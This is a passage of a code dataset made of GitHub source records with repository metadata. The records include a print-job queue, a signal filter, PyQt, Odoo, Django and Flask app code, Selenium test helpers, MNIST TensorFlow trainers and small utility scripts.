\n # stop execution if this is the case\n\n if direction == \"u\":\n index_of_target_position = cur_jobs.index(job_to_move) - how_many_times\n\n if direction == \"d\":\n index_of_target_position = cur_jobs.index(job_to_move) + how_many_times\n\n if index_of_target_position < 1 or index_of_target_position > len(cur_jobs) - 1:\n print(\"\\n Cannot move {} by {}\".format(id_to_move, how_many_times))\n return\n\n index_of_old_position = self.current_job_list.index(job_to_move)\n cur_jobs.insert(index_of_target_position, cur_jobs.pop(index_of_old_position))\n \n print(\"\\n Job {} succesfully moved {} by {}\".format(id_to_move, \n \"UP\" if direction == \"u\" else \"DOWN\", how_many_times))\n\n else:\n print(\"\\n move() can't use input:\", usr_input)\n\nclass Job:\n def __init__(self, prompted_info):\n self.prompted_info = prompted_info\n self.customer = prompted_info.get(\"customer\")\n self.product = prompted_info.get(\"product\")\n self.amount = prompted_info.get(\"amount\")\n self.material = prompted_info.get(\"material\")\n self.printing_sheet_size = prompted_info.get(\"printing_sheet_size\")\n # Status in prompted_info is always 1 or 2\n self._status = prompted_info.get(\"status\")\n # Setting status to corresponding value with property (Ready../Waiting...)\n self.status = self._status\n self.comment = prompted_info.get(\"comment\")\n self.addedDate = prompted_info.get(\"addedDate\")\n self.job_id = prompted_info.get(\"job_id\")\n self.priority = prompted_info.get(\"priority\") \n\n def _set_status(self, status_nro):\n if status_nro == \"1\":\n self._status = \"Ready to Print\"\n elif status_nro == \"2\":\n n = input(\"\\nWaiting for what: \")\n self._status = \"Waiting for: \" + n\n\n def _get_status(self):\n return self._status\n\n status = property(_get_status, _set_status)\n\n# Pistetään ohjelma pyörimään\nRUNNING_LIST = JobList()\nRUNNING_LIST.get_job_list_from_file()\n\nstart(RUNNING_LIST)\n","repo_name":"ulfaQ/JobFlow","sub_path":"jobflow.py","file_name":"jobflow.py","file_ext":"py","file_size_in_byte":14049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"41838779705","text":"import math\n\n\n# OneEuroFilter 滤波器\n# 参考于 https://jaantollander.com/post/noise-filtering-using-one-euro-filter\n\ndef smoothing_factor(t_e, cutoff):\n r = 2 * math.pi * cutoff * t_e\n return r / (r + 1)\n\n\ndef exponential_smoothing(a, x, x_prev):\n return a * x + (1 - a) * x_prev\n\n\nclass OneEuroFilter:\n def __init__(self, dx0=0.0, min_cutoff=1.0, beta=0.0,\n d_cutoff=1.0):\n \"\"\"Initialize the one euro filter.\"\"\"\n self.min_cutoff = float(min_cutoff)\n self.beta = float(beta)\n self.d_cutoff = float(d_cutoff)\n self.dx_prev = float(dx0)\n\n def __call__(self, x, x_prev):\n if x_prev is None:\n return x\n t_e = 1\n a_d = smoothing_factor(t_e, self.d_cutoff)\n dx = (x - x_prev) / t_e\n dx_hat = exponential_smoothing(a_d, dx, self.dx_prev)\n cutoff = self.min_cutoff + self.beta * abs(dx_hat)\n a = smoothing_factor(t_e, cutoff)\n x_hat = exponential_smoothing(a, x, x_prev)\n self.dx_prev = dx_hat\n return x_hat\n","repo_name":"L0veSunshine/Eye_Contact","sub_path":"4.Predict/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"26205129262","text":"# _*_ coding:utf-8 _*_\n# @File : weekly_report.py\n# @Time : 2020-10-15 11:28\n# @Author: zizle\nimport json\nfrom PyQt5.QtWidgets import qApp\nfrom PyQt5.QtNetwork import QNetworkRequest\nfrom PyQt5.QtCore import QUrl\nfrom .abstract_report import ReportAbstract\nfrom settings import SERVER_API\n\n\nclass WeeklyReport(ReportAbstract):\n def __init__(self, *args, **kwargs):\n super(WeeklyReport, self).__init__(*args, **kwargs)\n self.set_page_name(\"研究周报\")\n self.date_edit.hide() # 隐藏日期\n # 获取报告\n self.get_weekly_reports()\n # 点击查询\n self.query_button.clicked.connect(self.get_weekly_reports)\n # 点击页码的事件\n self.paginator.clicked.connect(self.get_weekly_reports)\n\n def get_weekly_reports(self):\n \"\"\" 分页查询周报数据 \"\"\"\n current_page = self.paginator.get_current_page()\n current_variety = self.variety_combobox.currentData()\n url = SERVER_API + \"report-file/paginator/?report_type=weekly&variety_en={}&page={}&page_size=50\".format(current_variety, current_page)\n network_manager = getattr(qApp, \"_network\")\n reply = network_manager.get(QNetworkRequest(QUrl(url)))\n reply.finished.connect(self.current_report_reply)\n\n def current_report_reply(self):\n \"\"\" 当前报告返回 \"\"\"\n reply = self.sender()\n if reply.error():\n pass\n else:\n data = json.loads(reply.readAll().data().decode(\"utf-8\"))\n self.show_report_content(data[\"reports\"])\n reply.deleteLater()\n","repo_name":"zizle/AnalysisDecisionClient","sub_path":"frames/homepage_extend/weekly_report.py","file_name":"weekly_report.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"14963648852","text":"import os,sys \nparentdir = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) \nsys.path.insert(0,parentdir) \n\nimport xmind\nfrom xmind.core.markerref import MarkerId\nxmind_name=\"mysql\"\nw = xmind.load(os.path.dirname(os.path.abspath(__file__))+\"\\\\\"+xmind_name+\".xmind\") \ns2=w.createSheet()\ns2.setTitle(\"order by\")\nr2=s2.getRootTopic()\nr2.setTitle(\"order by\")\n\ncontent={\n'order by':[\n {'排序使用空间(内存or磁盘)':[\n '排序所需内存',\n 'sort_buffer_size:MySQL 为排序开辟的内存(sort_buffer)的大小',\n 'max_length_for_sort_data:控制排序行数据长度,如单行长度超过此值,只写排序字段和id'\n ]},\n {'外部排序':[\n '使用归并算法',\n '将需排序数据分成n份,每份单独排序后存入临时文件',\n '最后将n份有序文件合并成一个有序的大文件'\n ]},\n {'全字段排序':[\n '流程:xx索引->表T主键索引->sort_buffer->sort_buffer排序->结果集',\n '内存大,优先选择此算法',\n '字段都放到sort_buffer中,排序后直接从内存返回,不再回表'\n ]},\n {'rowid排序':[\n '流程:xx索引->表T主键索引->sort_buffer->sort_buffer排序->表T主键索引->结果集',\n '归并算法和优先队列排序算法',\n '内存小,影响排序效率,使用此算法',\n '一次可以排序更多行,但需要回表(造成磁盘读)',\n '对于内存表,回表只是根据数据行位置得到数据(不访问磁盘),优化器优选rowid排序'\n ]},\n 'order by语句,未必都要排序,如数据是有序的,直接从索引上取数据,回表,组结果集'\n],\n'order by rand()':[\n 'MySQL对临时表排序的执行过程',\n '分析sql:select word from words order by rand() limit 3',\n {'order by rand()':[\n '使用Using temporary(内存临时表):排序时候使用rowid排序方法',\n 'tmp_table_size:限制了内存临时表大小,默认值16M',\n '如临时表超过了tmp_table_size,内存临时表就会转成磁盘临时表',\n '使用Using filesort(sort_buffer排序)'\n ]},\n {'rowid':[\n 'rowid:每个引擎用来唯一标识数据行的信息',\n '对有主键的 InnoDB 表,rowid 就是主键 ID',\n '对没有主键的 InnoDB 表,rowid 由系统生成的',\n 'MEMORY引擎不是索引组织表,可认为它是一个数组,rowid是数组的下标'\n ]}\n]\n}\n\n#构建xmind\nxmind.build(content,r2)\n#保存xmind\nxmind.save(w,os.path.dirname(os.path.abspath(__file__))+\"\\\\\"+xmind_name+\".xmind\") ","repo_name":"xiongmengmeng/xmind-technology","sub_path":"5.mysql/mysql8-order by.py","file_name":"mysql8-order by.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"33920519825","text":"from odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\n\n\nclass ProductAttribute(models.Model):\n _name = \"product.attribute\"\n _description = \"Product Attribute\"\n # if you change this _order, keep it in sync with the method\n # `_sort_key_attribute_value` in `product.template`\n _order = 'sequence, id'\n\n _sql_constraints = [\n (\n 'check_multi_checkbox_no_variant',\n \"CHECK(display_type != 'multi' OR create_variant = 'no_variant')\",\n \"Multi-checkbox display type is not compatible with the creation of variants\"\n ),\n ]\n\n name = fields.Char(string=\"Attribute\", required=True, translate=True)\n create_variant = fields.Selection(\n selection=[\n ('always', 'Instantly'),\n ('dynamic', 'Dynamically'),\n ('no_variant', 'Never (option)'),\n ],\n default='always',\n string=\"Variants Creation Mode\",\n help=\"\"\"- Instantly: All possible variants are created as soon as the attribute and its values are added to a product.\n - Dynamically: Each variant is created only when its corresponding attributes and values are added to a sales order.\n - Never: Variants are never created for the attribute.\n Note: the variants creation mode cannot be changed once the attribute is used on at least one product.\"\"\",\n required=True)\n display_type = fields.Selection(\n selection=[\n ('radio', 'Radio'),\n ('pills', 'Pills'),\n ('select', 'Select'),\n ('color', 'Color'),\n ('multi', 'Multi-checkbox (option)'),\n ],\n default='radio',\n required=True,\n help=\"The display type used in the Product Configurator.\")\n sequence = fields.Integer(string=\"Sequence\", help=\"Determine the display order\", index=True)\n\n value_ids = fields.One2many(\n comodel_name='product.attribute.value',\n inverse_name='attribute_id',\n string=\"Values\", copy=True)\n\n attribute_line_ids = fields.One2many(\n comodel_name='product.template.attribute.line',\n inverse_name='attribute_id',\n string=\"Lines\")\n product_tmpl_ids = fields.Many2many(\n comodel_name='product.template',\n string=\"Related Products\",\n compute='_compute_products',\n store=True)\n number_related_products = fields.Integer(compute='_compute_number_related_products')\n\n @api.depends('product_tmpl_ids')\n def _compute_number_related_products(self):\n for pa in self:\n pa.number_related_products = len(pa.product_tmpl_ids)\n\n @api.depends('attribute_line_ids.active', 'attribute_line_ids.product_tmpl_id')\n def _compute_products(self):\n for pa in self:\n pa.with_context(active_test=False).product_tmpl_ids = pa.attribute_line_ids.product_tmpl_id\n\n def _without_no_variant_attributes(self):\n return self.filtered(lambda pa: pa.create_variant != 'no_variant')\n\n def write(self, vals):\n \"\"\"Override to make sure attribute type can't be changed if it's used on\n a product template.\n\n This is important to prevent because changing the type would make\n existing combinations invalid without recomputing them, and recomputing\n them might take too long and we don't want to change products without\n the user knowing about it.\"\"\"\n if 'create_variant' in vals:\n for pa in self:\n if vals['create_variant'] != pa.create_variant and pa.number_related_products:\n raise UserError(_(\n \"You cannot change the Variants Creation Mode of the attribute %(attribute)s\"\n \" because it is used on the following products:\\n%(products)s\",\n attribute=pa.display_name,\n products=\", \".join(pa.product_tmpl_ids.mapped('display_name')),\n ))\n invalidate = 'sequence' in vals and any(record.sequence != 
vals['sequence'] for record in self)\n res = super().write(vals)\n if invalidate:\n # prefetched o2m have to be resequenced\n # (eg. product.template: attribute_line_ids)\n self.env.flush_all()\n self.env.invalidate_all()\n return res\n\n @api.ondelete(at_uninstall=False)\n def _unlink_except_used_on_product(self):\n for pa in self:\n if pa.number_related_products:\n raise UserError(_(\n \"You cannot delete the attribute %(attribute)s because it is used on the\"\n \" following products:\\n%(products)s\",\n attribute=pa.display_name,\n products=\", \".join(pa.product_tmpl_ids.mapped('display_name')),\n ))\n\n def action_open_related_products(self):\n return {\n 'type': 'ir.actions.act_window',\n 'name': _(\"Related Products\"),\n 'res_model': 'product.template',\n 'view_mode': 'tree,form',\n 'domain': [('id', 'in', self.product_tmpl_ids.ids)],\n }\n","repo_name":"odoo/odoo","sub_path":"addons/product/models/product_attribute.py","file_name":"product_attribute.py","file_ext":"py","file_size_in_byte":5093,"program_lang":"python","lang":"en","doc_type":"code","stars":31745,"dataset":"github-code","pt":"71"}
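A hedged sketch of exercising the model above through the ORM. It assumes a running Odoo environment env, and a name field on product.attribute.value (standard in Odoo, but the value model itself is not shown in this file):

# (0, 0, vals) tuples are the standard one2many "create" commands
attribute = env["product.attribute"].create({
    "name": "Color",
    "create_variant": "always",
    "display_type": "color",
    "value_ids": [(0, 0, {"name": "Red"}), (0, 0, {"name": "Blue"})],
})
# once the attribute is used on a product, changing create_variant
# raises the UserError defined in write() above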
+{"seq_id":"21080598472","text":"from collections import Counter\nfrom union_find import Component\n\ndef components(grid):\n rs = grid.split('\\n')\n cols = rs[0].count('+') - 1\n rows = len(rs) // 2\n comps = {(r, c):Component() for r in range(rows) for c in range(cols)}\n\n def noWallOnRight(r, c):\n return rs[2 * r + 1][3 * c + 3] == ' '\n\n def noWallBelow(r, c):\n return rs[2 * (r + 1)][3 * c + 1: 3 * c + 3] == ' '\n\n for r in range(rows):\n for c in range(cols):\n if noWallOnRight(r, c): comps[(r, c)].union(comps[(r, c + 1)])\n if noWallBelow(r, c): comps[(r, c)].union(comps[(r + 1, c)])\n\n for r in range(rows):\n for c in range(cols):\n comps[(r, c)] = comps[(r, c)].find()\n\n return sorted(Counter(Counter(comps.values()).values()).items(), reverse=True)\n\nfrom random import randrange\n\nclass Edge(object):\n def __init__(self, u, v):\n self.u = u\n self.v = v\n self.cost = randrange(10) + 1\n\nclass Node(object):\n def __init__(self, row, col):\n self.row = row\n self.col = col\n\ndef generate_grid(rows, cols, n):\n## assert n <= 2 * rows * cols - rows - cols\n assert n < rows * cols\n nodes = [[Node(r, c) for c in range(cols)] for r in range(rows)]\n v_edges = {Edge(nodes[r][c], nodes[r][c + 1]) for c in range(cols - 1) for r in range(rows)}\n h_edges = {Edge(nodes[r][c], nodes[r + 1][c]) for c in range(cols) for r in range(rows - 1)}\n all_edges = v_edges | h_edges\n sorted_edges = sorted(all_edges, key=lambda e: e.cost)\n comps = {node:Component() for row in nodes for node in row}\n def select_edges():\n s_edges = set()\n edge_gen = (e for e in sorted_edges)\n selected = 0\n while selected < n:\n e = next(edge_gen)\n if comps[e.u].find() != comps[e.v].find():\n comps[e.u].union(comps[e.v])\n s_edges.add((e.u.row, e.u.col, 'v' if e.u.row == e.v.row else 'h'))\n selected += 1\n return s_edges\n\n def grid(edges):\n lines = []\n lines.append('+' + '--+' * cols)\n for r in range(rows):\n lines.append('|' + ''.join(' ' if (r, c, 'v') in edges else ' |' for c in range(cols)))\n lines.append('+' + ''.join(' +' if (r, c, 'h') in edges else '--+' for c in range(cols)))\n return '\\n'.join(lines)\n \n return grid(select_edges())\n\n\n","repo_name":"ecolban/py_files","sub_path":"count_connectivity_components.py","file_name":"count_connectivity_components.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"39349825019","text":"import os\nimport time\nfrom django.contrib.staticfiles.testing import StaticLiveServerTestCase\nfrom selenium import webdriver\nfrom selenium.common.exceptions import WebDriverException\nfrom selenium.webdriver.common.keys import Keys\nfrom django.contrib.auth import BACKEND_SESSION_KEY, SESSION_KEY, get_user_model\nfrom django.contrib.sessions.backends.db import SessionStore\nfrom accounts.models import User\nfrom django.conf import settings\n\ndef wait(fn):\n def modified_fn(*args, **kwargs):\n MAX_WAIT = 10 \n start_time = time.time()\n while True:\n try:\n return fn(*args, **kwargs) \n except (AssertionError, WebDriverException) as e:\n if time.time() - start_time > MAX_WAIT:\n raise e\n time.sleep(0.5)\n return modified_fn\n\n\nclass FunctionalTest(StaticLiveServerTestCase):\n \n \n def setUp(self):\n self.browser = webdriver.Firefox(executable_path=\"C:\\\\Users\\\\Arnold\\\\geckodriver\\\\geckodriver.exe\")\n\n def get_item_input_box(self):\n return self.browser.find_element_by_id('text') \n\n \n\n @wait\n def wait_for(self, fn):\n return fn()\n\n @wait\n def wait_for_row_in_list_table(self, row_text):\n table = self.browser.find_element_by_id('id_list_table')\n rows = table.find_elements_by_tag_name('tr')\n self.assertIn(row_text, [row.text for row in rows])\n\n\n @wait\n def wait_to_be_logged_in(self, email):\n self.browser.find_element_by_link_text('Log out')\n navbar = self.browser.find_element_by_css_selector('.navbar')\n self.assertIn(email, navbar.text)\n\n\n @wait\n def wait_to_be_logged_out(self, email):\n self.browser.find_element_by_name('email')\n navbar = self.browser.find_element_by_css_selector('.navbar')\n self.assertNotIn(email, navbar.text)\n\n \n def create_pre_authenticated_session(self, email):\n user = User.objects.create(email=email)\n session = SessionStore()\n session[SESSION_KEY] = user.pk \n session[BACKEND_SESSION_KEY] = settings.AUTHENTICATION_BACKENDS[0]\n session.save()\n ## to set a cookie we need to first visit the domain.\n ## 404 pages load the quickest!\n self.browser.get(self.live_server_url + \"/404_no_such_url/\")\n self.browser.add_cookie(dict(\n name=settings.SESSION_COOKIE_NAME,\n value=session.session_key, \n path='/',\n )) \n\n ","repo_name":"SzocsArnold/TDDbook","sub_path":"functional_tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"13533340882","text":"import csv\nfrom flask import Flask, request\nfrom app.matrix import Matrix\napp = Flask(__name__)\n\n@app.route('/echo', methods=['GET', 'POST'])\ndef hello_world():\n if request.method == 'POST':\n f = request.files['file']\n # open file and read its contents\n data = []\n \n try:\n # read csv file\n with open(f.filename, 'r') as obj:\n # Return a reader object which will\n # iterate over lines in the given csvfile\n csv_reader = csv.reader(obj)\n \n # convert string to list\n data = list(csv_reader)\n # perform all matrix operations\n matrix = Matrix(data)\n \n # perform all matrix contents and join them as a string\n result = \"*********** Matrix to String ***********\\n\" + matrix.matrixToString() + '\\n' + \"*********** Flatten Matrix ***********\\n\" + matrix.matrixFlatten() + '\\n' + \"*********** Inverted Matrix ***********\\n\" + matrix.matrixInvert() + '\\n' + \"*********** Product of all Elements ***********\\n\" + str(matrix.matrixProduct()) + '\\n' + \"*********** Sum of all Elements ***********\\n\" + str(matrix.matrixSum()) + '\\n'\n \n return result\n except:\n return \"Invalid CSV file\"\n \n return 'Hello, please upload a csv file!'","repo_name":"matrixjnr/flask_testing","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"18892468986","text":"'''\n File name: mnist.py\n Author: Team Pi\n Date created: 04/04/2019\n Assignment: Assignment 2, Machine Learning for Data Analytics\n\n Networks for the MNIST dataset\n'''\n\n\n#Convolutional Networks\ndef cnn(combination, learning_rate, n_epochs, batches):\n import tensorflow_datasets as tfds\n import numpy as np\n from tensorflow.keras import datasets, layers, models, callbacks\n from tensorflow.keras.optimizers import RMSprop\n from tensorflow.keras.callbacks import ModelCheckpoint\n\n #import the data\n builder = tfds.builder(\"mnist\")\n assert builder.info.splits['train'].num_examples == 60000\n builder.download_and_prepare()\n datasets = builder.as_dataset()\n np_datasets = tfds.as_numpy(datasets)\n mnist = np_datasets\n\n #get the test and training datset splits\n train = list(mnist['train'])\n test = list(mnist['test'])\n X_train = [item['image'] for item in train]\n X_train = np.asarray(X_train, dtype=np.float32)\n train_images = X_train / 255.0\n\n y_train = [item['label'] for item in train]\n train_labels = np.asarray(y_train, dtype=np.int32)\n\n X_test = [item['image'] for item in test]\n X_test = np.asarray(X_test, dtype=np.float32)\n test_images = X_test / 255.0\n\n y_test = [item['label'] for item in test]\n test_labels = np.asarray(y_test, dtype=np.int32)\n\n #create the model\n model = models.Sequential()\n model.add(layers.Conv2D(32, (5, 5), activation='relu', input_shape=(28, 28, 1)))\n model.add(layers.MaxPooling2D((2, 2)))\n if (combination == 2):\n model.add(layers.Conv2D(32, (3, 3), activation='relu'))\n model.add(layers.MaxPooling2D((2, 2)))\n model.add(layers.Flatten())\n if (combination == 4):\n model.add(layers.Dropout(0.9))\n else:\n model.add(layers.Dropout(0.4))\n model.add(layers.Dense(100, activation='sigmoid'))\n model.add(layers.Dense(10, activation='softmax'))\n model.compile(optimizer=RMSprop(lr=learning_rate),\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n #model.summary()\n #create ckpt file\n if (combination == 1):\n model.save(\"mnist-1-\"+ str(learning_rate) + \"-\" +str(n_epochs) + \"-\" + str(batches) + \".ckpt\")\n tbCallBack = callbacks.TensorBoard(log_dir='/Graph', histogram_freq=0,\n write_graph=True, write_images=True)\n model.fit(train_images, train_labels, epochs=n_epochs, verbose=0, batch_size=60000 // batches,\n callbacks=[tbCallBack])\n train_loss, train_acc = model.evaluate(train_images, train_labels, verbose=0)\n test_loss, test_acc = model.evaluate(test_images, test_labels, verbose = 0)\n print(\"Training Accuracy:\",train_acc)\n print(\"Testing Accuracy:\", test_acc)\n\n\ndef mlp(combination, learning_rate, n_epochs, batches):\n from itertools import islice\n import tensorflow_datasets as tfds\n from tensorflow.contrib.layers import fully_connected\n import numpy as np\n from tensorflow.nn import sigmoid, relu, sparse_softmax_cross_entropy_with_logits, in_top_k\n from tensorflow import placeholder,float32, int64, name_scope, reduce_mean, global_variables_initializer, cast, Session\n from tensorflow.train import Saver, GradientDescentOptimizer\n\n #import the data\n builder = tfds.builder(\"mnist\")\n assert builder.info.splits['train'].num_examples == 60000\n builder.download_and_prepare()\n datasets = builder.as_dataset()\n np_datasets = tfds.as_numpy(datasets)\n mnist = np_datasets\n train = list(mnist['train'])\n test = list(mnist['test'])\n\n #define the placeholders\n\n X = placeholder(float32, shape=(None, 784), name=\"X\")\n y = placeholder(int64, shape=(None), 
name=\"y\")\n\n with name_scope(\"mlp\"):\n hidden1 = fully_connected(X, 100, scope=\"hidden1\", activation_fn=sigmoid)\n if combination == 2:\n hidden2 = fully_connected(hidden1, 100, scope=\"hidden2\", activation_fn=sigmoid)\n hidden3 = fully_connected(hidden2, 100, scope=\"hidden3\", activation_fn=sigmoid)\n logits = fully_connected(hidden3, 10, scope=\"outputs\", activation_fn=None)\n else:\n logits = fully_connected(hidden1, 10, scope=\"outputs\", activation_fn=None)\n\n with name_scope(\"loss\"):\n xentropy = sparse_softmax_cross_entropy_with_logits(\n labels=y, logits=logits)\n loss = reduce_mean(xentropy, name=\"loss\")\n\n with name_scope(\"eval\"):\n correct = in_top_k(logits, y, 1)\n accuracy = reduce_mean(cast(correct, float32))\n\n init = global_variables_initializer()\n saver = Saver()\n\n with name_scope(\"train\"):\n optimizer = GradientDescentOptimizer(learning_rate)\n training_op = optimizer.minimize(loss)\n\n with Session() as sess:\n init.run()\n for epoch in range(n_epochs):\n for iteration in range(batches):\n temp = list(islice(train, 60000 // batches))\n X_train = [item['image'] for item in temp]\n y_train = [item['label'] for item in temp]\n new_batch = []\n for item in X_train:\n new_batch.append(item.reshape(784))\n sess.run(training_op, feed_dict={X: new_batch, y: y_train})\n acc_train = accuracy.eval(feed_dict={X: new_batch, y: y_train})\n X_test = [item['image'] for item in test]\n y_test = [item['label'] for item in test]\n new_test = []\n for item in X_test:\n new_test.append(item.reshape(784))\n acc_test = accuracy.eval(feed_dict={X: new_test, y: y_test})\n print(\"Training accuracy:\", acc_train)\n print(\"Testing accuracy:\", acc_test)\n #save_path = saver.save(sess, \"./my_model_final.ckpt\")\n\n","repo_name":"2092971R/cs987","sub_path":"mnist_combinations.py","file_name":"mnist_combinations.py","file_ext":"py","file_size_in_byte":5774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"5781280048","text":"import numpy as np\nimport cv2\nimport Tkinter as tk\nfrom Tkinter import *\nimport Image, ImageTk\nimport urllib\nimport sqlite3\nimport ttk\nimport tkMessageBox\nfrom face_recognizer import recognizeFace\nfrom dataset_creator import datasetCreate\n\n#Global variables\nfontFace = cv2.FONT_HERSHEY_SIMPLEX\nfontScale = 1\nfontColor = (255, 0, 0)\nfontColor1 = (0, 0, 255)\nsampleNum =0\n#url='http://192.168.0.109:8080/shot.jpg'\n\ndetector = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\nrecognizer = cv2.face.LBPHFaceRecognizer_create()\n\nrecognizer.read('trainer/trainer.yml')\n\ncascadePath = \"haarcascade_frontalface_default.xml\"\n\nfaceCascade = cv2.CascadeClassifier(cascadePath);\n\n#Set up GUI\nroot = tk.Tk()\nroot.geometry(\"1280x800\")\n#Makes main window\nroot.wm_title(\"Floating Faces\")\nroot.config(background=\"#00394d\")\n\n#Graphics window\nimageFrame = tk.Frame(root, width=200, height=600)\nimageFrame.grid(row=0, column=0, padx=70, pady=100)\n# Button(root,text=tk.Frame = tk.LabelFrame\"Submit\").grid(row=3)\n\n#Capture video frames\nlmain = tk.Label(imageFrame)\nlmain.grid(row=0, column=0)\n\n\n# Quits the TkInter app when called\ndef quit_app():\n root.quit()\n\n\n# Opens a message box when called\ndef show_about(event=None):\n tkMessageBox.showwarning(\n \"About\",\n \"This Awesome Program was Made in 2016\"\n )\n\n\n# Create the menu object\nthe_menu = Menu(root)\n\n# ----- FILE MENU -----\n\n# Create a pull down menu that can't be removed\nfile_menu = Menu(the_menu, tearoff=0)\n\n# Add items to the menu that show when clicked\n# compound allows you to add an image\nfile_menu.add_command(label=\"Open\")\nfile_menu.add_command(label=\"Save\")\n\n# Add a horizontal bar to group similar commands\nfile_menu.add_separator()\n\n# Call for the function to execute when clicked\nfile_menu.add_command(label=\"Quit\", command=quit_app)\n\n# Add the pull down menu to the menu bar\nthe_menu.add_cascade(label=\"File\", menu=file_menu)\n\ndef insertOrUpdate(Name):\n conn = sqlite3.connect(\"Faces1.0.db\")\n with conn:\n cur=conn.cursor()\n cur.execute(\"INSERT INTO People(Name) VALUES ('\"+ Name +\"');\")\n max_id = cur.lastrowid\n Id= max_id\n cmd = \"SELECT * FROM People WHERE ID=\"+str(Id)\n cursor = conn.execute(cmd)\n isRecordExist=0\n for row in cursor:\n isRecordExist=1\n if(isRecordExist==1):\n cmd = \"UPDATE people SET Name=' \" + str(sname) + \" ' WHERE ID=\" + str(Id)\n else:\n cmd = \"INSERT INTO people(ID,Name) Values(\" + str(Id) + \",' \" + str(sname) + \" ' )\"\n conn.execute(cmd)\n conn.commit()\n conn.close()\n return max_id\n## VIDEO FEED ##\ndef createFrame():\n\n cv2image = datasetCreate()\n\n#Slider window (slider controls stage position)\n#sliderFrame = tk.Frame(root, width=1000, height=200)\n#sliderFrame.grid(row = 600, column=0, padx=10, pady=2)\n\nroot.config(menu=the_menu)\ncreateFrame() #Display loop\nroot.mainloop() #Starts GUI\n","repo_name":"oneguygirl/FFRec","sub_path":"VFR_GUI_dataset_creator.py","file_name":"VFR_GUI_dataset_creator.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"26781160386","text":"#!/usr/bin/python3\n\nimport logging, time, codecs\n\n# Define logging\nlogging.basicConfig(level=logging.DEBUG, format=' %(asctime)s - [%(levelname)s] - %(message)s')\ndebugging = True\nif not debugging:\n\tlogging.disable(logging.DEBUG)\nlogging.info('Starting FileToBase64.py')\nlogging.info('Reading file.')\n\nabsolute_input_path = '/home/dhall/tmp/sunset.jpg'\nabsolute_output_path = '/home/dhall/tmp/sunset.base64'\n\nwith open(absolute_input_path, \"rb\") as binary_input_file, \\\n\t\topen(absolute_output_path, 'wt') as base64_output_file:\n\tbinary_data = binary_input_file.read()\n\tif(debugging):\n\t\tlogging.debug('Debug messages')\n\t\ttime.sleep(.005)\n\t\tprint(binary_data)\n\t\t# Encoding to base64 leaves it in binary mode, need to decode the binary text\n\t\tprint(codecs.encode(binary_data, 'base64'))\n\t\tprint(codecs.encode(binary_data, 'base64').decode('utf-8'))\n\n\tlogging.info('Writing file.')\n\tbase64_output_file.write(codecs.encode(binary_data, 'base64').decode('utf-8'))\n","repo_name":"dallas-hall/python-projects","sub_path":"Attachment-Text-Extraction/FileToBase64.py","file_name":"FileToBase64.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"70640667750","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.views.decorators.cache import cache_control\nfrom django.views.decorators.cache import cache_control\nfrom django.contrib.auth.decorators import login_required\nfrom voteau.models import Votazione, Partecipazioni, Quesito\nfrom django.contrib.auth import get_user_model\nfrom django.contrib import messages\nfrom voteau.forms import *\nfrom django.db.models import Q\nfrom datetime import date\nfrom functools import reduce\nimport operator\nimport ast\n\n\ndef blank(request):\n return redirect('home')\n\n\ndef Login(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('home')\n else:\n messages.info(request, \"Password o username non corretti\")\n return render(request, \"login.html\")\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef home(request):\n return render(request, \"home.html\", {\"votations\": (Votazione.objects.all())})\n\n\ndef register(request):\n form = CreateUserForm()\n if request.method == 'POST':\n form = CreateUserForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('login')\n return render(request, \"register.html\", {'form': form})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef Logout(request):\n logout(request)\n return redirect('login')\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef AddVotation(request):\n form = AddVotazioneForm()\n if request.method == \"POST\":\n form = AddVotazioneForm(request.POST)\n instance = form.instance\n if form.is_valid() or instance.autore_id == 0:\n instance = form.instance\n instance.autore_id = request.user.id\n instance.save()\n messages.success(request, f\"Votazione {instance.nome} creata!\")\n return render(request, \"addvotation.html\", {'form': form})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef votations(request, autoreId, votationId):\n autoreid = int(autoreId)\n autore = User.objects.get(pk=autoreid)\n try:\n votation = Votazione.objects.get(pk=votationId)\n except Votazione.DoesNotExist:\n votation = None\n\n qs = Partecipazioni.objects.all().filter(id_votazione=votation)\n utenti = qs.only('id_partecipante_id')\n if utenti.exists():\n utenti_n = User.objects.exclude(reduce(operator.or_, (Q(id__contains=x) for x in utenti.values_list('id_partecipante', flat=True))))\n return render(request, \"votation.html\", {'votation': votation, 